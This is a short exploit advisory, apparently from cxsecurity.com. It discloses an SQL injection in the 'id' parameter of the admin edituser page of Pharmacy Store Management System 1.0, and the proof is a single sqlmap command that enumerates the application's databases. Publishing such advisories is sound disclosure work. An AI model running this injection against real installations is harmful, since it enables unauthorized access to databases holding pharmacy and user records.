Pharmacy Store Management System 1.0 id SQL Injection

2020.12.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection # Google Dork: N/A # Date: 1.12.2020 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Kali Linux Use SQLMAP: sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top